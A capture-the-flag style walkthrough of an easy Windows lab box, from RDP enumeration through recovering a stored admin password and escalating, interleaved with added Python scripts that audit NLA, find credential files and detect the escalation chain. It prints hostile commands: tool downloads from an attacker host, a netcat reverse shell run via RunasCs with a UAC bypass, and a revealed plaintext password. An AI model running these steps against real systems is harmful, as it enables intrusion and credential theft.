VulnEscape
#easy #windows
PORT     STATE SERVICE       REASON
3389/tcp open  ms-wbt-server syn-ack ttl 127

echo -n $(cat allPorts.gnmap | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ','; echo) | xclip -sel clip

nmap -p 3389 -sCV -Pn -n -vv <TARGET-IP> -oA openPortsServicesVersion

PORT     STATE SERVICE       REASON          VERSION
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=Escape
| Issuer: commonName=Escape
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-24T12:19:22
| Not valid after: 2026-03-26T12:19:22
| MD5: 3dde:c441:ea35:6a12:4c3d:d69a:eaff:c3c4
| SHA-1: f9fb:dc07:f0a5:4206:d475:d488:3fee:c463:cb53:f3c7
| -----BEGIN CERTIFICATE-----
| MIIC0DCCAbigAwIBAgIQdIymnh/AzZRLbMY9RHSl+jANBgkqhkiG9w0BAQsFADAR
| MQ8wDQYDVQQDEwZFc2NhcGUwHhcNMjUwOTI0MTIxOTIyWhcNMjYwMzI2MTIxOTIy
| WjARMQ8wDQYDVQQDEwZFc2NhcGUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
| AoIBAQDmbPW5qyhmia8Cud4sV3d8MVMkBZkEuPkaC5DmTnYtqfTUcg6Z6HPeeDuN
| bDz8FwZtL3uF+deriimEDwJNZzPNoa4Sbs7ZaNZKsrShJo1pdT1YeFgtzovqXww0
| vzW44s9T3NfAFS5TtWpU3Fqh4G8CoulMJ1xLI+ZV/xyRfMtyT1cWZL/TR3UycNj2
| PGQ4dw3RBDaZP65wkc1rEnx4sctcnPOs9nI8ShNUJtx0r8VYITAgayl6KNS1CUwR
| qhPu10Ap4QdM+KlN/uurjuP3+h8D6JhFzEarI/2wNfUWJU5FpSWT79SwG2DbxPFl
| d3L0dNtwlmIN29Pe1/Yab0z0U45BAgMBAAGjJDAiMBMGA1UdJQQMMAoGCCsGAQUF
| BwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsFAAOCAQEAsvL4HPZoi6YdvQy0
| /49u+6zCkFcEw6yhbOTJfT+UQ8YhS+16+84NIHb251DzzujYQVo1G2OE2d4g34Xf
| 5V6rix91gv4XVmsPeTMDloe9y8rWjegYQizoE15Y2dVrTXrX2cS/gGeR8Z14HmXu
| jp0WfW5rUh1o76tqMppDc7Jfyz+aElQ3H9kXi6qqkMyR3o1ojdjBS8RXSsoy8d9L
| kcPC2k8VgW9cbat9fhrGuoCBhxJwn2jTr2i3/5qbdsKwLYqNo2wsWohEIFDop8ET
| fExSBW56DXj0Mn16OEYQ1I97Abb/aZcwbfjRYGCeYMsJiZGwYW9GcU6ABv5bsH0I
| YZZYhg==
|_-----END CERTIFICATE-----
|_ssl-date: 2025-09-25T12:31:04+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: ESCAPE
| NetBIOS_Domain_Name: ESCAPE
| NetBIOS_Computer_Name: ESCAPE
| DNS_Domain_Name: Escape
| DNS_Computer_Name: Escape
| Product_Version: 10.0.19041
|_ System_Time: 2025-09-25T12:31:00+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s

nmap -p 3389 --script rdp-enum-encryption,rdp-ntlm-info,rdp-vuln-ms12-020 -Pn -n <TARGET-IP> -oN rdp_enum.txt

PORT     STATE SERVICE
3389/tcp open ms-wbt-server
| rdp-ntlm-info:
| Target_Name: ESCAPE
| NetBIOS_Domain_Name: ESCAPE
| NetBIOS_Computer_Name: ESCAPE
| DNS_Domain_Name: Escape
| DNS_Computer_Name: Escape
| Product_Version: 10.0.19041
|_ System_Time: 2025-09-25T12:35:34+00:00
| rdp-enum-encryption:
| Security layer
| CredSSP (NLA): SUCCESS
| CredSSP with Early User Auth: SUCCESS
| RDSTLS: SUCCESS
| SSL: SUCCESS
|_  RDP Protocol Version: Unknown

xfreerdp3 /v:<TARGET-IP> /d:Escape /p:'' /w:1366 /h:768 /sec:nla:off

User: KioskUser0

PS C:\Users\kioskUser0\Downloads> cd ..\Desktop\
PS C:\Users\kioskUser0\Desktop> type user.txt
PS C:\Users\kioskUser0\Desktop> cd C:\
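The rdp-enum-encryption result above shows the host accepting the plain TLS ("SSL") security layer alongside CredSSP, which means Network Level Authentication is not enforced; that is the condition the xfreerdp3 connection with /sec:nla:off depends on to reach the logon screen before any credential is presented. The script below is an added example and not part of the original writeup: it parses the NSE output as saved to rdp_enum.txt (the scan output above is embedded as the sample) and reports layers that bypass NLA, so exported scans can be checked for hosts that should have NLA required. The layer names are the ones the NSE script prints; the "hardened" variant is constructed by dropping the SSL line, and the RC4 check covers the script's "RDP Encryption level" block, which this scan did not produce.

```python
"""Audit nmap rdp-enum-encryption / rdp-ntlm-info output for RDP hardening gaps."""
import re

# Sample input: the rdp_enum.txt output shown above, NSE tree decoration included.
SAMPLE_NMAP_OUTPUT = """\
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
| rdp-ntlm-info:
|   Target_Name: ESCAPE
|   NetBIOS_Domain_Name: ESCAPE
|   NetBIOS_Computer_Name: ESCAPE
|   DNS_Domain_Name: Escape
|   DNS_Computer_Name: Escape
|   Product_Version: 10.0.19041
|_  System_Time: 2025-09-25T12:35:34+00:00
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|     RDSTLS: SUCCESS
|     SSL: SUCCESS
|_  RDP Protocol Version: Unknown
"""

# Constructed variant of the same scan with the SSL layer refused, i.e. a host that enforces NLA.
HARDENED_NMAP_OUTPUT = SAMPLE_NMAP_OUTPUT.replace("|     SSL: SUCCESS\n", "")

# Security layers the NSE script can report that do not require NLA: a client negotiating one of
# them reaches the Windows logon screen without authenticating first.
NON_NLA_LAYERS = {"SSL", "Native RDP"}


def parse_nmap_rdp(text):
    """Turn the two NSE script sections into a dict; lines outside a '|' block are ignored."""
    result = {"ntlm_info": {}, "security_layers": {}, "encryption_levels": {}, "protocol_version": None}
    section = subsection = None
    for raw in text.splitlines():
        if not raw.startswith("|"):            # end of an NSE script block
            section = subsection = None
            continue
        line = re.sub(r"^[|_\s]+", "", raw).rstrip()   # drop the tree decoration
        if line == "rdp-ntlm-info:":
            section, subsection = "ntlm", None
        elif line == "rdp-enum-encryption:":
            section, subsection = "enc", None
        elif section == "ntlm" and ": " in line:
            key, value = line.split(": ", 1)
            result["ntlm_info"][key] = value
        elif section == "enc":
            if line == "Security layer":
                subsection = "security_layers"
            elif line.startswith("RDP Encryption level"):   # second block the script prints when present
                subsection = "encryption_levels"
            elif line.startswith("RDP Protocol Version: "):
                result["protocol_version"] = line.split(": ", 1)[1]
            elif subsection and ": " in line:
                name, status = line.split(": ", 1)
                result[subsection][name] = status
    return result


def audit_nmap_rdp(text):
    """Return finding strings; an empty list means the scan shows none of the gaps checked here."""
    parsed = parse_nmap_rdp(text)
    layers = parsed["security_layers"]
    findings = []
    exposed = sorted(n for n, s in layers.items() if s == "SUCCESS" and n in NON_NLA_LAYERS)
    if exposed:
        findings.append("non-NLA security layer accepted: " + ", ".join(exposed))
    if layers.get("CredSSP (NLA)") != "SUCCESS":
        findings.append("CredSSP (NLA) not offered")
    weak = sorted(n for n, s in parsed["encryption_levels"].items() if s == "SUCCESS" and "RC4" in n)
    if weak:
        findings.append("legacy RC4 encryption level accepted: " + ", ".join(weak))
    return findings


if __name__ == "__main__":
    for label, text in (("scan above", SAMPLE_NMAP_OUTPUT), ("hardened host", HARDENED_NMAP_OUTPUT)):
        host = parse_nmap_rdp(text)["ntlm_info"].get("NetBIOS_Computer_Name", "?")
        print(f"{label} ({host}):", audit_nmap_rdp(text) or ["no findings"])
```

Run against the scan above it reports the SSL layer; against the constructed hardened variant it reports nothing. The remediation it points at is the "Require user authentication for remote connections by using Network Level Authentication" setting, which makes the server refuse the non-CredSSP layers.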
PS C:\> dir -Force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 2/4/2024 12:52 AM $Recycle.Bin
d--h-- 6/24/2025 8:23 AM $WinREAgent
d--hsl 2/3/2024 11:32 AM Documents and Settings
d----- 2/3/2024 3:11 AM inetpub
d----- 12/7/2019 1:14 AM PerfLogs
d-r--- 4/10/2025 11:29 PM Program Files
d-r--- 2/3/2024 3:03 AM Program Files (x86)
d--h-- 6/24/2025 8:06 AM ProgramData
d--hs- 10/1/2024 11:40 PM Recovery
d--hs- 6/16/2025 4:42 AM System Volume Information
d-r--- 2/3/2024 3:43 AM Users
d----- 6/24/2025 1:24 PM Windows
d--h-- 2/3/2024 3:05 AM _admin
-a-hs- 2/4/2024 1:35 AM 8192 DumpStack.log
-a-hs- 9/25/2025 8:08 AM 8192 DumpStack.log.tmp
-a-hs- 10/1/2024 11:48 PM 2093002752 hiberfil.sys
-a-hs- 9/25/2025 8:08 AM 1476395008 pagefile.sys
-a-hs- 9/25/2025 8:08 AM 16777216 swapfile.sys

PS C:\> cd _admin
PS C:\_admin> dir
Directory: C:\_admin
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/3/2024 3:04 AM installers
d----- 2/3/2024 3:05 AM passwords
d----- 2/3/2024 3:05 AM temp
-a---- 2/3/2024 3:03 AM 0 Default.rdp
-a---- 2/3/2024 3:04 AM 574 profiles.xml
PS C:\_admin> type profiles.xml
<?xml version="1.0" encoding="utf-16"?>
<!-- Remote Desktop Plus -->
<Data>
<Profile>
<ProfileName>admin</ProfileName>
<UserName>127.0.0.1</UserName>
<Password>JWqkl6IDfQxXXmiHIKIP8ca0G9XxnWQZgvtPgON2vWc=</Password>
<Secure>False</Secure>
</Profile>
</Data>
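The profiles.xml above is a Remote Desktop Plus profile store that a low-privileged kiosk account can read, with a stored password for the admin profile. The script below is an added example, not code from the writeup or from the Remote Desktop Plus project: it walks a directory tree for profiles.xml files tagged by that tool, parses the UTF-16 XML, and reports each profile that embeds a password, without ever emitting the password itself. The sample file is constructed to mirror the one above (the password blob is a placeholder, and a second clean profile is added); the meaning of the Secure element is the tool's own and is only reported as stored.

```python
"""Locate Remote Desktop Plus profile files that embed credentials and report them."""
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample modelled on the profiles.xml above. The password value is a placeholder,
# not the blob from the page; the second profile is added to show a clean entry.
SAMPLE_PROFILES_XML = """<?xml version="1.0" encoding="utf-16"?>
<!-- Remote Desktop Plus -->
<Data>
  <Profile>
    <ProfileName>admin</ProfileName>
    <UserName>127.0.0.1</UserName>
    <Password>BASE64-BLOB-PLACEHOLDER=</Password>
    <Secure>False</Secure>
  </Profile>
  <Profile>
    <ProfileName>jump-host</ProfileName>
    <UserName>ops</UserName>
    <Password></Password>
    <Secure>True</Secure>
  </Profile>
</Data>
""".encode("utf-16")   # matches the declared encoding; Python's codec also writes the BOM


def is_rdplus_profile(raw):
    """Cheap pre-filter: the tool tags its file with an XML comment, so look for it after decoding."""
    return "Remote Desktop Plus" in raw.decode("utf-16", errors="ignore")


def audit_profiles_xml(raw):
    """Return one dict per profile that stores a password; the password itself is never returned."""
    text = raw.decode("utf-16")                          # BOM-aware decode
    text = re.sub(r"^\s*<\?xml[^>]*\?>", "", text)       # declaration is moot once we hold str
    findings = []
    for profile in ET.fromstring(text).iter("Profile"):
        secret = (profile.findtext("Password") or "").strip()
        if not secret:
            continue
        findings.append({
            "profile": profile.findtext("ProfileName", default=""),
            "username": profile.findtext("UserName", default=""),
            "secure_flag": profile.findtext("Secure", default=""),  # reported as stored
            "password_chars": len(secret),
        })
    return findings


def scan_tree(root_dir):
    """Walk root_dir for profiles.xml files written by Remote Desktop Plus; returns {path: findings}."""
    report = {}
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name.lower() != "profiles.xml":
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                raw = fh.read()
            if is_rdplus_profile(raw):
                report[path] = audit_profiles_xml(raw)
    return report


def demo_scan():
    """Write the sample under a temp dir shaped like C:\\_admin and scan it; keys are relative paths."""
    with tempfile.TemporaryDirectory() as tmp:
        admin_dir = os.path.join(tmp, "_admin")
        os.makedirs(admin_dir)
        with open(os.path.join(admin_dir, "profiles.xml"), "wb") as fh:
            fh.write(SAMPLE_PROFILES_XML)
        return {os.path.relpath(p, tmp): f for p, f in scan_tree(tmp).items()}


if __name__ == "__main__":
    for path, findings in demo_scan().items():
        for f in findings:
            print(f"{path}: profile {f['profile']!r} stores a {f['password_chars']}-char password "
                  f"for {f['username']!r} (Secure={f['secure_flag']})")
```

Point scan_tree at a drive root on a host where the tool is deployed to get the same report for real files; the decision of whether a hit matters then comes down to who can read the file, which on this box was any user that could reach C:\_admin.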
PS C:\_admin> cd 'C:\Program Files (x86)\Remote Desktop Plus\'
PS C:\Program Files (x86)\Remote Desktop Plus> .\rdp.exe
PS C:\Program Files (x86)\Remote Desktop Plus> copy -r C:\_admin C:\Users\kioskUser0\Downloads\

python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

PS C:\Users\kioskUser0\Downloads> wget http://<ATTACKER-IP>:<PORT>/BulletsPassView.exe -outfile BulletsPassView.exe
PS C:\Users\kioskUser0\Downloads> .\BulletsPassView.exe

Password: Twisting3021

python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

PS C:\Users\kioskUser0\Downloads> wget http://<ATTACKER-IP>:<PORT>/RunasCs.exe -outfile RunasCs.exe
PS C:\Users\kioskUser0\Downloads> wget http://<ATTACKER-IP>:<PORT>/nc64.exe -outfile nc64.exe

nc -lnvp 1111
listening on [any] 1111 ...

PS C:\Users\kioskUser0\Downloads> .\RunasCs.exe admin Twisting3021 "C:\Users\kioskUser0\Downloads\nc64.exe <ATTACKER-IP> <PORT> -e cmd.exe" --bypass-uac

connect to [10.10.14.137] from (UNKNOWN) [10.129.234.51] 53205
Microsoft Windows [Version 10.0.19045.5965]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 4A4B-52B4
Directory of C:\Users\Administrator\Desktop
02/03/2024 04:44 AM <DIR> .
02/03/2024 04:44 AM <DIR> ..
02/03/2024 10:07 AM 2,332 Microsoft Edge.lnk
09/25/2025 08:10 AM 34 root.txt
2 File(s) 2,366 bytes
2 Dir(s) 5,578,952,704 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
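The escalation above leaves a distinctive trail in process-creation telemetry: binaries executed from the kiosk user's Downloads folder, a child process created under a different account than its parent (RunasCs.exe launching nc64.exe as admin), and cmd.exe spawned by a network tool rather than by the desktop shell. The script below is an added example, not part of the writeup: it runs three such rules over constructed process-creation records carrying the fields Sysmon Event ID 1 also provides. The records are a simplified reconstruction of this chain (the real parent/child layout after RunasCs may differ), the rule names are mine, the listener address 10.0.0.5:1111 is made up, and the password argument is shown as <REDACTED>.

```python
"""Flag process-creation records that match the RunasCs.exe / nc64.exe chain shown above."""
import re
from collections import namedtuple

# Simplified process-creation records carrying the fields a Sysmon Event ID 1 also provides.
# Constructed to mirror this page's escalation chain; the password argument is shown as
# <REDACTED> and the listener address 10.0.0.5:1111 is made up.
Proc = namedtuple("Proc", "pid ppid user image parent_image cmdline")

SAMPLE_EVENTS = [
    Proc(800, 600, r"NT AUTHORITY\SYSTEM", r"C:\Windows\System32\services.exe",
         r"C:\Windows\System32\wininit.exe", "services.exe"),
    Proc(1200, 800, r"NT AUTHORITY\NETWORK SERVICE", r"C:\Windows\System32\svchost.exe",
         r"C:\Windows\System32\services.exe", "svchost.exe -k NetworkService"),
    Proc(3000, 2900, r"ESCAPE\kioskUser0", r"C:\Windows\explorer.exe",
         r"C:\Windows\System32\userinit.exe", "explorer.exe"),
    Proc(4100, 3000, r"ESCAPE\kioskUser0",
         r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r"C:\Windows\explorer.exe", "powershell.exe"),
    Proc(4212, 4100, r"ESCAPE\kioskUser0", r"C:\Users\kioskUser0\Downloads\RunasCs.exe",
         r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r'RunasCs.exe admin <REDACTED> "C:\Users\kioskUser0\Downloads\nc64.exe 10.0.0.5 1111 -e cmd.exe" --bypass-uac'),
    Proc(4300, 4212, r"ESCAPE\admin", r"C:\Users\kioskUser0\Downloads\nc64.exe",
         r"C:\Users\kioskUser0\Downloads\RunasCs.exe", "nc64.exe 10.0.0.5 1111 -e cmd.exe"),
    Proc(4320, 4300, r"ESCAPE\admin", r"C:\Windows\System32\cmd.exe",
         r"C:\Users\kioskUser0\Downloads\nc64.exe", "cmd.exe"),
    Proc(5000, 3000, r"ESCAPE\kioskUser0", r"C:\Program Files (x86)\Remote Desktop Plus\rdp.exe",
         r"C:\Windows\explorer.exe", "rdp.exe"),
]

# R1: a kiosk account should never execute images from locations it can write to.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(Downloads|AppData\\Local\\Temp)\\", re.IGNORECASE)
# R2: command shells normally descend from the desktop shell, a service, or another shell.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
EXPECTED_SHELL_PARENTS = {"explorer.exe", "services.exe", "winlogon.exe", "userinit.exe",
                          "cmd.exe", "powershell.exe", "pwsh.exe"}
# R3: SYSTEM legitimately starts processes under other accounts (services, logon); an ordinary
# user's process doing so is the runas-with-explicit-credentials pattern.
SYSTEM_ACCOUNTS = {r"NT AUTHORITY\SYSTEM"}


def basename(path):
    """Last path component, lower-cased, for Windows-style paths."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return sorted (pid, rule) pairs; one pid may trip several rules."""
    by_pid = {e.pid: e for e in events}
    alerts = set()
    for e in events:
        if USER_WRITABLE.search(e.image):
            alerts.add((e.pid, "R1-image-in-user-writable-dir"))
        if basename(e.image) in SHELLS and basename(e.parent_image) not in EXPECTED_SHELL_PARENTS:
            alerts.add((e.pid, "R2-shell-from-unexpected-parent"))
        parent = by_pid.get(e.ppid)           # parent record may be missing from a partial log
        if parent and parent.user != e.user and parent.user not in SYSTEM_ACCOUNTS:
            alerts.add((e.pid, "R3-spawned-under-different-account"))
    return sorted(alerts)


if __name__ == "__main__":
    by_pid = {e.pid: e for e in SAMPLE_EVENTS}
    for pid, rule in detect(SAMPLE_EVENTS):
        e = by_pid[pid]
        print(f"{rule}: pid {pid} {e.user} {e.cmdline}  (parent: {basename(e.parent_image)})")
```

On the sample the first four records (service start-up and the kiosk user's normal desktop and PowerShell) produce nothing, while RunasCs.exe and nc64.exe trip R1, nc64.exe additionally trips R3 because it runs as admin under a parent owned by kioskUser0, and the final cmd.exe trips R2. R1 on its own is the cheapest control here: an application allow-list or AppLocker rule that denies execution from user-writable paths would have stopped the chain at the first download.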